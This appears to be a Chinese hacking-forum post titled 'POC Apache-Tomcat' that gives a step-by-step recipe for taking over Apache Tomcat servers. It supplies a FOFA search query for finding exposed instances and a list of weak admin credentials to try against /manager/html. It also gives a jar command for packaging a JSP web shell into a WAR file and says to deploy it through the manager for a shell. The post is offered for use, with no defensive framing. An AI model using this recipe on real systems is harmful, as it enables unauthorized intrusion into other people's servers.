POC Apache-Tomcat

Shacker · 09 12, 2024

JavaScript:

## 应用简介

![img](tomcat.png)

Tomcat 是当前最流行的 Java 中间件服务器之一。

官方网站：http://tomcat.apache.org

## 相关资产

FOFA

```http
app="APACHE-Tomcat"
```

## 环境搭建

VulnRange可快速搭建此环境

## 弱口令Getshell

1、访问`ip:8080/manager/html`

```http
admin/admin
admin/Admin
admin/Admin@123
tomcat/tomcat
tomcat/空
tomcat/123456
tomcat/654321
tomcat/000000
tomcat/111111
admin/123456
admin/654321
admin/000000
admin/111111
```

2、部署`war包`getshell

```bash
#shell.jsp单独放置一个目录，命令行下进入当前目录,打包成war包
jar -cvf login.war .\
```

找到 WAR file to deploy 这一项，上传war包后应用即可

	POC Apache-Tomcat Shacker 09 12, 2024 POC/?Day漏洞数据
	POC Apache Kylin Shacker 09 10, 2024 POC/?Day漏洞数据
	POC Apache Tapestry远程代码执行漏洞 Shacker 09 13, 2024 POC/?Day漏洞数据
	综合 Apache Flink 1.11.0 Shacker 09 10, 2024 POC/?Day漏洞数据
	POC Apache Struts2 Shacker 09 12, 2024 POC/?Day漏洞数据

黑客仓库

POC Apache-Tomcat

论坛统计

新会员

在线会员

关于我们